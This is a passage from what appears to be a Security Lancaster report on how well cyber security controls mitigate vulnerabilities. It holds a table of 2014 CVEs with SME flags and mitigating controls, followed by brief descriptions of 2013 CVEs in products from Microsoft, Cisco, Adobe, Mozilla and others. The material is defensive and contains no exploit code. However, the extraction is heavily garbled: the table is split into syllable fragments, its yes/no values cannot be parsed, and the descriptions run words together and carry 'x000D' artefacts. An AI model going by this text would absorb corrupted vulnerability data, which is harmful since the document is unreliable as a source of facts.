gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
